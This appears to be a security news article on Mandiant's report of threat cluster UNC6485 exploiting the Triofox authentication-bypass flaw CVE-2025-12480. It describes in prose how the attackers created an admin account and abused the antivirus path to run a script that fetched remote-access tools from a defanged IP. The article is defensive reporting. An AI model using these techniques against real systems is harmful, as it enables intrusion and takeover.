Google’s Mandiant Threat Defense on Monday reported the discovery of active exploitation targeting a fixed security vulnerability in Gladinet’s Triofox file-sharing and remote access software. This flaw, designated as CVE-2025-12480 and carrying a critical CVSS score of 9.1, permitted an attacker to circumvent authentication protocols and gain access to the platform’s configuration pages.
This unauthorized access was then leveraged to upload and execute malicious payloads, representing a severe security breach.The technology giant noted that a specific threat cluster, identified as UNC6485, had been observed actively weaponizing this vulnerability since August 24, 2025. Critically, this activity began almost a month after Gladinet made patches available in version 16.7.10368.56560. The vulnerability’s re-emergence is part of a pattern, as CVE-2025-12480 is the third Triofox flaw to be actively exploited this year, following CVE-2025-30406 and CVE-2025-11371.
The patch itself focused on hardening the initial configuration pages, with release notes stating, “These pages can no longer be accessed after Triofox has been set up.”Mandiant’s analysis details that the threat actors exploited the unauthenticated access vulnerability to reach the configuration pages, subsequently running the setup process to create a new, native administrative account named “Cluster Admin.”
This newly created, high-privilege account was then used to facilitate follow-on malicious activities. To achieve code execution, the attackers logged in with the new Admin account and uploaded malicious files, which were then executed using Triofox’s built-in antivirus feature. Security researchers explained that because the antivirus setup allows a user to provide an arbitrary path for the scanner location, the configured file inherits the Triofox parent process privileges, which run under the highly sensitive SYSTEM account.According to Mandiant, the attackers took advantage of this mechanism by configuring the antivirus engine path to point to a malicious batch script named “centre_report.bat.”
This script was designed to connect to an external IP address (84.200.80$$.$$252) and download an installer for Zoho Unified Endpoint Management System (UEMS). The ultimate goal of this deployment was to install remote access programs, specifically Zoho Assist and AnyDesk, onto the compromised host.The remote access capabilities provided by Zoho Assist were then utilized by the threat actors to conduct internal reconnaissance. This was followed by attempts to elevate their privileges by changing the passwords of existing accounts and adding these accounts to both local administrator groups and the powerful “Domain Admins” group.
Furthermore, to evade detection and maintain persistence, the attackers downloaded legitimate tools like Plink and PuTTY to establish an encrypted SSH tunnel to a command-and-control (C2) server over port 433, with the final objective of allowing seamless inbound Remote Desktop Protocol (RDP) traffic. While the precise motive behind the overall campaign remains unclear, Triofox users are strongly urged to update to the latest version, thoroughly audit all administrator accounts, and verify that the platform’s antivirus feature is not configured to execute any unauthorized scripts or binaries.
Reference:
